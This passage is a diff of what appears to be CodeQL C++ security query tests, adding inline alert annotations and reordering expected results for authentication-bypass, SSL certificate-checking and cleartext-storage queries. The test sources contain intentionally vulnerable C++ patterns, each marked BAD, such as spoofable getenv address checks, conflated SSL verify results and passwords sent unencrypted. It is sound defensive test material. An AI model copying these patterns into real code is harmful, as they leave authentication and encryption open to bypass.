| call to strcmp | test.cpp:16:25:16:42 | *call to getenv | test.cpp:20:14:20:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:16:25:16:42 | *call to getenv | an environment variable | -| test.cpp:31:7:31:12 | call to strcmp | test.cpp:27:25:27:42 | *call to getenv | test.cpp:31:14:31:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:27:25:27:42 | *call to getenv | an environment variable | -| test.cpp:42:7:42:12 | call to strcmp | test.cpp:38:25:38:42 | *call to getenv | test.cpp:42:14:42:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:38:25:38:42 | *call to getenv | an environment variable | -| test.cpp:52:7:52:12 | call to strcmp | test.cpp:49:25:49:42 | *call to getenv | test.cpp:52:14:52:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:42 | *call to getenv | an environment variable | -| test.cpp:56:7:56:12 | call to strcmp | test.cpp:49:25:49:42 | *call to getenv | test.cpp:56:14:56:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:42 | *call to getenv | an environment variable | -| test.cpp:60:7:60:12 | call to strcmp | test.cpp:49:25:49:42 | *call to getenv | test.cpp:60:14:60:20 | *address | Untrusted input $@ might be vulnerable to a spoofing attack. | test.cpp:49:25:49:42 | *call to getenv | an environment variable | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.qlref index cf3c4b27d278..3e4f219f5233 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/AuthenticationBypass.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-290/AuthenticationBypass.ql \ No newline at end of file +query: Security/CWE/CWE-290/AuthenticationBypass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/test.cpp index 72b9155cb841..92fe7c24748e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-290/semmle/AuthenticationBypass/test.cpp @@ -13,51 +13,51 @@ int isServer; void processRequest1() { - const char *address = getenv("SERVERIP"); + const char *address = getenv("SERVERIP"); // $ Source // BAD: the address is controllable by the user, so it // could be spoofed to bypass the security check. - if (strcmp(address, "127.0.0.1")) { + if (strcmp(address, "127.0.0.1")) { // $ Alert isServer = 1; } } void processRequest2() { - const char *address = getenv("SERVERIP"); + const char *address = getenv("SERVERIP"); // $ Source // BAD: the address is controllable by the user, so it // could be spoofed to bypass the security check. - if (strcmp(address, "www.mycompany.com")) { + if (strcmp(address, "www.mycompany.com")) { // $ Alert isServer = 1; } } void processRequest3() { - const char *address = getenv("SERVERIP"); + const char *address = getenv("SERVERIP"); // $ Source // BAD: the address is controllable by the user, so it // could be spoofed to bypass the security check. - if (strcmp(address, "www.mycompany.co.uk")) { + if (strcmp(address, "www.mycompany.co.uk")) { // $ Alert isServer = 1; } } void processRequest4() { - const char *address = getenv("SERVERIP"); + const char *address = getenv("SERVERIP"); // $ Source bool cond = false; - if (strcmp(address, "127.0.0.1")) { cond = true; } // BAD + if (strcmp(address, "127.0.0.1")) { cond = true; } // BAD // $ Alert if (strcmp(address, "127_0_0_1")) { cond = true; } // GOOD (not an IP) if (strcmp(address, "127.0.0")) { cond = true; } // GOOD (not an IP) if (strcmp(address, "127.0.0.0.1")) { cond = true; } // GOOD (not an IP) - if (strcmp(address, "http://mycompany")) { cond = true; } // BAD + if (strcmp(address, "http://mycompany")) { cond = true; } // BAD // $ Alert if (strcmp(address, "http_//mycompany")) { cond = true; } // GOOD (not an address) if (strcmp(address, "htt://mycompany")) { cond = true; } // GOOD (not an address) if (strcmp(address, "httpp://mycompany")) { cond = true; } // GOOD (not an address) - if (strcmp(address, "mycompany.com")) { cond = true; } // BAD + if (strcmp(address, "mycompany.com")) { cond = true; } // BAD // $ Alert if (strcmp(address, "mycompany_com")) { cond = true; } // GOOD (not an address) if (strcmp(address, "mycompany.c")) { cond = true; } // GOOD (not an address) if (strcmp(address, "mycompany.comm")) { cond = true; } // GOOD (not an address) diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-295/SSLResultConflation.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-295/SSLResultConflation.qlref index 493b42eeae1f..116b386747b9 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-295/SSLResultConflation.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-295/SSLResultConflation.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-295/SSLResultConflation.ql \ No newline at end of file +query: Security/CWE/CWE-295/SSLResultConflation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-295/SSLResultNotChecked.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-295/SSLResultNotChecked.qlref index f019c08b357a..fc0209620fec 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-295/SSLResultNotChecked.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-295/SSLResultNotChecked.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-295/SSLResultNotChecked.ql \ No newline at end of file +query: Security/CWE/CWE-295/SSLResultNotChecked.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-295/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-295/test.cpp index 74f00600a506..d059123b30b4 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-295/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-295/test.cpp @@ -15,7 +15,7 @@ bool is_ok(int result) bool is_maybe_ok(int result) { - return (result == 0) || (result == 1); // BAD (conflates OK and a non-OK codes) + return (result == 0) || (result == 1); // BAD (conflates OK and a non-OK codes) // $ Alert[cpp/certificate-result-conflation] } void test1_1(SSL *ssl) @@ -35,7 +35,7 @@ void test1_1(SSL *ssl) { int result = SSL_get_verify_result(ssl); - if ((result == 0) || (result == 1)) // BAD (conflates OK and a non-OK codes) + if ((result == 0) || (result == 1)) // BAD (conflates OK and a non-OK codes) // $ Alert[cpp/certificate-result-conflation] { } } @@ -51,7 +51,7 @@ void test1_1(SSL *ssl) { int result = SSL_get_verify_result(ssl); - if ((result == 0) || (false) || (result == 2)) // BAD (conflates OK and a non-OK codes) + if ((result == 0) || (false) || (result == 2)) // BAD (conflates OK and a non-OK codes) // $ Alert[cpp/certificate-result-conflation] { } } @@ -59,7 +59,7 @@ void test1_1(SSL *ssl) { int result = SSL_get_verify_result(ssl); - if ((0 == result) || (1 == result)) // BAD (conflates OK and a non-OK codes) + if ((0 == result) || (1 == result)) // BAD (conflates OK and a non-OK codes) // $ Alert[cpp/certificate-result-conflation] { } } @@ -67,7 +67,7 @@ void test1_1(SSL *ssl) { int result = SSL_get_verify_result(ssl); - if ((result != 0) && (result != 1)) // BAD (conflates OK and a non-OK codes) + if ((result != 0) && (result != 1)) // BAD (conflates OK and a non-OK codes) // $ Alert[cpp/certificate-result-conflation] { } else { // conflation occurs here @@ -80,11 +80,11 @@ void test1_1(SSL *ssl) int result2 = get_verify_result_indirect(ssl); int result3 = something_else(ssl); - if ((result == 0) || (result_cpy == 1)) // BAD (conflates OK and a non-OK codes) + if ((result == 0) || (result_cpy == 1)) // BAD (conflates OK and a non-OK codes) // $ Alert[cpp/certificate-result-conflation] { } - if ((result2 == 0) || (result2 == 1)) // BAD (conflates OK and a non-OK codes) + if ((result2 == 0) || (result2 == 1)) // BAD (conflates OK and a non-OK codes) // $ Alert[cpp/certificate-result-conflation] { } @@ -104,9 +104,9 @@ void test1_1(SSL *ssl) { int result = SSL_get_verify_result(ssl); - bool ok = (result == 0) || (result == 1); // BAD (conflates OK and a non-OK codes) + bool ok = (result == 0) || (result == 1); // BAD (conflates OK and a non-OK codes) // $ Alert[cpp/certificate-result-conflation] - if (ok) { + if (ok) { // $ Alert[cpp/certificate-result-conflation] } } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-295/test2.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-295/test2.cpp index ed6e3989f2b0..46f89f79868b 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-295/test2.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-295/test2.cpp @@ -10,7 +10,7 @@ bool maybe(); bool test2_1(SSL *ssl) { - int cert = SSL_get_peer_certificate(ssl); // BAD (SSL_get_verify_result is never called) + int cert = SSL_get_peer_certificate(ssl); // BAD (SSL_get_verify_result is never called) // $ Alert[cpp/certificate-not-checked] return true; } @@ -25,7 +25,7 @@ bool test2_2(SSL *ssl) bool test2_3(SSL *ssl) { - int cert = SSL_get_peer_certificate(ssl); // BAD (SSL_get_verify_result may not be called) + int cert = SSL_get_peer_certificate(ssl); // BAD (SSL_get_verify_result may not be called) // $ Alert[cpp/certificate-not-checked] if (maybe()) { @@ -58,7 +58,7 @@ bool test2_5(SSL *ssl) { int cert, result; - cert = SSL_get_peer_certificate(ssl); // BAD (SSL_get_verify_result is not used reliably) + cert = SSL_get_peer_certificate(ssl); // BAD (SSL_get_verify_result is not used reliably) // $ Alert[cpp/certificate-not-checked] if ((cert != 0) && (maybe())) { result = SSL_get_verify_result(ssl); @@ -86,7 +86,7 @@ bool test2_7(SSL *ssl) { int cert; - cert = SSL_get_peer_certificate(ssl); // BAD (SSL_get_verify_result is only called when there is not a cert) + cert = SSL_get_peer_certificate(ssl); // BAD (SSL_get_verify_result is only called when there is not a cert) // $ Alert[cpp/certificate-not-checked] if (cert != 0) return false; if (SSL_get_verify_result(ssl) != 0) return false; diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextBufferWrite.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextBufferWrite.expected index 4133d62f00a3..7598d27e2153 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextBufferWrite.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextBufferWrite.expected @@ -1,3 +1,6 @@ +#select +| test2.cpp:110:3:110:6 | call to gets | test2.cpp:110:3:110:6 | *call to gets | test2.cpp:110:3:110:6 | *call to gets | This write into buffer 'password' may contain unencrypted data from $@. | test2.cpp:110:3:110:6 | *call to gets | user input (string read by gets) | +| test.cpp:58:3:58:9 | call to sprintf | test.cpp:53:27:53:30 | **argv | test.cpp:58:25:58:29 | *input | This write into buffer 'passwd' may contain unencrypted data from $@. | test.cpp:53:27:53:30 | **argv | user input (a command-line argument) | edges | test.cpp:53:27:53:30 | **argv | test.cpp:54:17:54:23 | *access to array | provenance | | | test.cpp:54:17:54:23 | *access to array | test.cpp:58:25:58:29 | *input | provenance | | @@ -7,6 +10,3 @@ nodes | test.cpp:54:17:54:23 | *access to array | semmle.label | *access to array | | test.cpp:58:25:58:29 | *input | semmle.label | *input | subpaths -#select -| test2.cpp:110:3:110:6 | call to gets | test2.cpp:110:3:110:6 | *call to gets | test2.cpp:110:3:110:6 | *call to gets | This write into buffer 'password' may contain unencrypted data from $@. | test2.cpp:110:3:110:6 | *call to gets | user input (string read by gets) | -| test.cpp:58:3:58:9 | call to sprintf | test.cpp:53:27:53:30 | **argv | test.cpp:58:25:58:29 | *input | This write into buffer 'passwd' may contain unencrypted data from $@. | test.cpp:53:27:53:30 | **argv | user input (a command-line argument) | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextBufferWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextBufferWrite.qlref index 6c83c30d549e..05046b6a5d53 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextBufferWrite.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextBufferWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-311/CleartextBufferWrite.ql \ No newline at end of file +query: Security/CWE/CWE-311/CleartextBufferWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextFileWrite.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextFileWrite.expected index e283cbeb57bc..067222327f28 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextFileWrite.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextFileWrite.expected @@ -1,3 +1,19 @@ +#select +| test2.cpp:43:2:43:8 | call to fprintf | test2.cpp:43:36:43:43 | password | test2.cpp:43:36:43:43 | password | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:43:36:43:43 | password | this source. | +| test2.cpp:44:2:44:8 | call to fprintf | test2.cpp:44:37:44:45 | thepasswd | test2.cpp:44:37:44:45 | thepasswd | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:44:37:44:45 | thepasswd | this source. | +| test2.cpp:45:2:45:8 | call to fprintf | test2.cpp:45:38:45:47 | accountkey | test2.cpp:45:38:45:47 | accountkey | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:45:38:45:47 | accountkey | this source. | +| test2.cpp:50:2:50:8 | call to fprintf | test2.cpp:50:41:50:53 | passwd_config | test2.cpp:50:41:50:53 | passwd_config | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:50:41:50:53 | passwd_config | this source. | +| test2.cpp:54:2:54:8 | call to fprintf | test2.cpp:54:41:54:52 | widepassword | test2.cpp:54:41:54:52 | widepassword | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:54:41:54:52 | widepassword | this source. | +| test2.cpp:55:2:55:8 | call to fprintf | test2.cpp:55:40:55:51 | widepassword | test2.cpp:55:40:55:51 | widepassword | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:55:40:55:51 | widepassword | this source. | +| test2.cpp:57:2:57:8 | call to fprintf | test2.cpp:57:39:57:49 | call to getPassword | test2.cpp:57:39:57:49 | call to getPassword | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:57:39:57:49 | call to getPassword | this source. | +| test2.cpp:65:3:65:9 | call to fprintf | test2.cpp:62:18:62:25 | password | test2.cpp:65:31:65:34 | cpy1 | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:62:18:62:25 | password | this source. | +| test2.cpp:73:3:73:9 | call to fprintf | test2.cpp:72:15:72:24 | password | test2.cpp:73:30:73:32 | *buf | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:72:17:72:24 | password | this source. | +| test2.cpp:99:3:99:9 | call to fprintf | test2.cpp:98:45:98:52 | password | test2.cpp:99:27:99:32 | *buffer | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:98:45:98:52 | password | this source. | +| test.cpp:45:3:45:7 | call to fputs | test.cpp:45:9:45:19 | thePassword | test.cpp:45:9:45:19 | thePassword | This write into file 'file' may contain unencrypted data from $@. | test.cpp:45:9:45:19 | thePassword | this source. | +| test.cpp:70:35:70:35 | call to operator<< | test.cpp:70:38:70:48 | thePassword | test.cpp:70:38:70:48 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:70:38:70:48 | thePassword | this source. | +| test.cpp:73:37:73:41 | call to write | test.cpp:70:38:70:48 | thePassword | test.cpp:73:43:73:53 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:70:38:70:48 | thePassword | this source. | +| test.cpp:73:37:73:41 | call to write | test.cpp:73:43:73:53 | thePassword | test.cpp:73:43:73:53 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:73:43:73:53 | thePassword | this source. | +| test.cpp:73:37:73:41 | call to write | test.cpp:73:63:73:73 | thePassword | test.cpp:73:43:73:53 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:73:63:73:73 | thePassword | this source. | edges | test2.cpp:62:18:62:25 | password | test2.cpp:62:18:62:25 | password | provenance | | | test2.cpp:62:18:62:25 | password | test2.cpp:65:31:65:34 | cpy1 | provenance | | @@ -26,19 +42,3 @@ nodes | test.cpp:73:43:73:53 | thePassword | semmle.label | thePassword | | test.cpp:73:63:73:73 | thePassword | semmle.label | thePassword | subpaths -#select -| test2.cpp:43:2:43:8 | call to fprintf | test2.cpp:43:36:43:43 | password | test2.cpp:43:36:43:43 | password | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:43:36:43:43 | password | this source. | -| test2.cpp:44:2:44:8 | call to fprintf | test2.cpp:44:37:44:45 | thepasswd | test2.cpp:44:37:44:45 | thepasswd | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:44:37:44:45 | thepasswd | this source. | -| test2.cpp:45:2:45:8 | call to fprintf | test2.cpp:45:38:45:47 | accountkey | test2.cpp:45:38:45:47 | accountkey | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:45:38:45:47 | accountkey | this source. | -| test2.cpp:50:2:50:8 | call to fprintf | test2.cpp:50:41:50:53 | passwd_config | test2.cpp:50:41:50:53 | passwd_config | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:50:41:50:53 | passwd_config | this source. | -| test2.cpp:54:2:54:8 | call to fprintf | test2.cpp:54:41:54:52 | widepassword | test2.cpp:54:41:54:52 | widepassword | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:54:41:54:52 | widepassword | this source. | -| test2.cpp:55:2:55:8 | call to fprintf | test2.cpp:55:40:55:51 | widepassword | test2.cpp:55:40:55:51 | widepassword | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:55:40:55:51 | widepassword | this source. | -| test2.cpp:57:2:57:8 | call to fprintf | test2.cpp:57:39:57:49 | call to getPassword | test2.cpp:57:39:57:49 | call to getPassword | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:57:39:57:49 | call to getPassword | this source. | -| test2.cpp:65:3:65:9 | call to fprintf | test2.cpp:62:18:62:25 | password | test2.cpp:65:31:65:34 | cpy1 | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:62:18:62:25 | password | this source. | -| test2.cpp:73:3:73:9 | call to fprintf | test2.cpp:72:15:72:24 | password | test2.cpp:73:30:73:32 | *buf | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:72:17:72:24 | password | this source. | -| test2.cpp:99:3:99:9 | call to fprintf | test2.cpp:98:45:98:52 | password | test2.cpp:99:27:99:32 | *buffer | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:98:45:98:52 | password | this source. | -| test.cpp:45:3:45:7 | call to fputs | test.cpp:45:9:45:19 | thePassword | test.cpp:45:9:45:19 | thePassword | This write into file 'file' may contain unencrypted data from $@. | test.cpp:45:9:45:19 | thePassword | this source. | -| test.cpp:70:35:70:35 | call to operator<< | test.cpp:70:38:70:48 | thePassword | test.cpp:70:38:70:48 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:70:38:70:48 | thePassword | this source. | -| test.cpp:73:37:73:41 | call to write | test.cpp:70:38:70:48 | thePassword | test.cpp:73:43:73:53 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:70:38:70:48 | thePassword | this source. | -| test.cpp:73:37:73:41 | call to write | test.cpp:73:43:73:53 | thePassword | test.cpp:73:43:73:53 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:73:43:73:53 | thePassword | this source. | -| test.cpp:73:37:73:41 | call to write | test.cpp:73:63:73:73 | thePassword | test.cpp:73:43:73:53 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:73:63:73:73 | thePassword | this source. | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextFileWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextFileWrite.qlref index f047858d8808..9469736d8c77 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextFileWrite.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextFileWrite.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-311/CleartextFileWrite.ql \ No newline at end of file +query: Security/CWE/CWE-311/CleartextFileWrite.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.expected index fae3d76599a8..370555e6811b 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.expected @@ -1,3 +1,44 @@ +#select +| test3.cpp:22:3:22:6 | call to send | test3.cpp:22:15:22:23 | password1 | test3.cpp:22:15:22:23 | password1 | This operation transmits 'password1', which may contain unencrypted sensitive data from $@. | test3.cpp:22:15:22:23 | password1 | password1 | +| test3.cpp:26:3:26:6 | call to send | test3.cpp:26:15:26:23 | password2 | test3.cpp:26:15:26:23 | password2 | This operation transmits 'password2', which may contain unencrypted sensitive data from $@. | test3.cpp:26:15:26:23 | password2 | password2 | +| test3.cpp:47:3:47:6 | call to recv | test3.cpp:47:15:47:22 | password | test3.cpp:47:15:47:22 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:47:15:47:22 | password | password | +| test3.cpp:55:3:55:6 | call to recv | test3.cpp:55:15:55:22 | password | test3.cpp:55:15:55:22 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:55:15:55:22 | password | password | +| test3.cpp:76:3:76:6 | call to send | test3.cpp:74:21:74:29 | password1 | test3.cpp:76:15:76:17 | ptr | This operation transmits 'ptr', which may contain unencrypted sensitive data from $@. | test3.cpp:74:21:74:29 | password1 | password1 | +| test3.cpp:83:3:83:6 | call to recv | test3.cpp:81:15:81:22 | password | test3.cpp:83:15:83:17 | ptr | This operation receives into 'ptr', which may put unencrypted sensitive data into $@. | test3.cpp:81:15:81:22 | password | password | +| test3.cpp:101:3:101:6 | call to read | test3.cpp:101:12:101:19 | password | test3.cpp:101:12:101:19 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:101:12:101:19 | password | password | +| test3.cpp:114:2:114:5 | call to recv | test3.cpp:134:11:134:18 | password | test3.cpp:114:14:114:19 | buffer | This operation receives into 'buffer', which may put unencrypted sensitive data into $@. | test3.cpp:134:11:134:18 | password | password | +| test3.cpp:140:3:140:6 | call to send | test3.cpp:138:24:138:32 | password1 | test3.cpp:140:15:140:17 | ptr | This operation transmits 'ptr', which may contain unencrypted sensitive data from $@. | test3.cpp:138:24:138:32 | password1 | password1 | +| test3.cpp:146:3:146:6 | call to send | test3.cpp:126:9:126:23 | global_password | test3.cpp:146:15:146:18 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:126:9:126:23 | global_password | global_password | +| test3.cpp:159:3:159:6 | call to send | test3.cpp:157:19:157:26 | password | test3.cpp:159:15:159:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:157:19:157:26 | password | password | +| test3.cpp:228:2:228:5 | call to send | test3.cpp:228:26:228:33 | password | test3.cpp:228:26:228:33 | password | This operation transmits 'password', which may contain unencrypted sensitive data from $@. | test3.cpp:228:26:228:33 | password | password | +| test3.cpp:241:2:241:6 | call to fgets | test3.cpp:241:8:241:15 | password | test3.cpp:241:8:241:15 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:241:8:241:15 | password | password | +| test3.cpp:272:3:272:6 | call to send | test3.cpp:270:16:270:23 | password | test3.cpp:272:15:272:18 | *data | This operation transmits '*data', which may contain unencrypted sensitive data from $@. | test3.cpp:270:16:270:23 | password | password | +| test3.cpp:290:2:290:5 | call to send | test3.cpp:317:11:317:19 | password1 | test3.cpp:290:14:290:17 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:317:11:317:19 | password1 | password1 | +| test3.cpp:295:2:295:5 | call to send | test3.cpp:322:16:322:24 | password2 | test3.cpp:295:14:295:17 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:322:16:322:24 | password2 | password2 | +| test3.cpp:300:2:300:5 | call to send | test3.cpp:322:16:322:24 | password2 | test3.cpp:300:14:300:17 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:322:16:322:24 | password2 | password2 | +| test3.cpp:341:4:341:7 | call to recv | test3.cpp:341:16:341:23 | password | test3.cpp:341:16:341:23 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:341:16:341:23 | password | password | +| test3.cpp:388:3:388:6 | call to recv | test3.cpp:388:15:388:22 | password | test3.cpp:388:15:388:22 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:388:15:388:22 | password | password | +| test3.cpp:414:3:414:6 | call to recv | test3.cpp:414:15:414:24 | password | test3.cpp:414:15:414:24 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:414:15:414:24 | password | password | +| test3.cpp:420:3:420:6 | call to recv | test3.cpp:420:15:420:24 | password | test3.cpp:420:15:420:24 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:420:15:420:24 | password | password | +| test3.cpp:431:2:431:6 | call to fgets | test3.cpp:431:8:431:15 | password | test3.cpp:431:8:431:15 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:431:8:431:15 | password | password | +| test3.cpp:507:2:507:5 | call to send | test3.cpp:507:14:507:39 | social_security_number | test3.cpp:507:14:507:39 | social_security_number | This operation transmits 'social_security_number', which may contain unencrypted sensitive data from $@. | test3.cpp:507:14:507:39 | social_security_number | social_security_number | +| test3.cpp:508:2:508:5 | call to send | test3.cpp:508:14:508:33 | socialSecurityNo | test3.cpp:508:14:508:33 | socialSecurityNo | This operation transmits 'socialSecurityNo', which may contain unencrypted sensitive data from $@. | test3.cpp:508:14:508:33 | socialSecurityNo | socialSecurityNo | +| test3.cpp:509:2:509:5 | call to send | test3.cpp:509:14:509:29 | homePostCode | test3.cpp:509:14:509:29 | homePostCode | This operation transmits 'homePostCode', which may contain unencrypted sensitive data from $@. | test3.cpp:509:14:509:29 | homePostCode | homePostCode | +| test3.cpp:510:2:510:5 | call to send | test3.cpp:510:14:510:28 | my_zip_code | test3.cpp:510:14:510:28 | my_zip_code | This operation transmits 'my_zip_code', which may contain unencrypted sensitive data from $@. | test3.cpp:510:14:510:28 | my_zip_code | my_zip_code | +| test3.cpp:511:2:511:5 | call to send | test3.cpp:511:14:511:26 | telephone | test3.cpp:511:14:511:26 | telephone | This operation transmits 'telephone', which may contain unencrypted sensitive data from $@. | test3.cpp:511:14:511:26 | telephone | telephone | +| test3.cpp:512:2:512:5 | call to send | test3.cpp:512:14:512:36 | mobile_phone_number | test3.cpp:512:14:512:36 | mobile_phone_number | This operation transmits 'mobile_phone_number', which may contain unencrypted sensitive data from $@. | test3.cpp:512:14:512:36 | mobile_phone_number | mobile_phone_number | +| test3.cpp:513:2:513:5 | call to send | test3.cpp:513:14:513:22 | email | test3.cpp:513:14:513:22 | email | This operation transmits 'email', which may contain unencrypted sensitive data from $@. | test3.cpp:513:14:513:22 | email | email | +| test3.cpp:514:2:514:5 | call to send | test3.cpp:514:14:514:38 | my_credit_card_number | test3.cpp:514:14:514:38 | my_credit_card_number | This operation transmits 'my_credit_card_number', which may contain unencrypted sensitive data from $@. | test3.cpp:514:14:514:38 | my_credit_card_number | my_credit_card_number | +| test3.cpp:515:2:515:5 | call to send | test3.cpp:515:14:515:35 | my_bank_account_no | test3.cpp:515:14:515:35 | my_bank_account_no | This operation transmits 'my_bank_account_no', which may contain unencrypted sensitive data from $@. | test3.cpp:515:14:515:35 | my_bank_account_no | my_bank_account_no | +| test3.cpp:516:2:516:5 | call to send | test3.cpp:516:14:516:29 | employerName | test3.cpp:516:14:516:29 | employerName | This operation transmits 'employerName', which may contain unencrypted sensitive data from $@. | test3.cpp:516:14:516:29 | employerName | employerName | +| test3.cpp:517:2:517:5 | call to send | test3.cpp:517:14:517:29 | medical_info | test3.cpp:517:14:517:29 | medical_info | This operation transmits 'medical_info', which may contain unencrypted sensitive data from $@. | test3.cpp:517:14:517:29 | medical_info | medical_info | +| test3.cpp:518:2:518:5 | call to send | test3.cpp:518:14:518:28 | license_key | test3.cpp:518:14:518:28 | license_key | This operation transmits 'license_key', which may contain unencrypted sensitive data from $@. | test3.cpp:518:14:518:28 | license_key | license_key | +| test3.cpp:527:3:527:6 | call to send | test3.cpp:526:44:526:54 | my_latitude | test3.cpp:527:15:527:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:526:44:526:54 | my_latitude | my_latitude | +| test3.cpp:533:3:533:6 | call to send | test3.cpp:532:45:532:58 | home_longitude | test3.cpp:533:15:533:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:532:45:532:58 | home_longitude | home_longitude | +| test3.cpp:552:3:552:6 | call to send | test3.cpp:551:47:551:58 | salaryString | test3.cpp:552:15:552:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:551:47:551:58 | 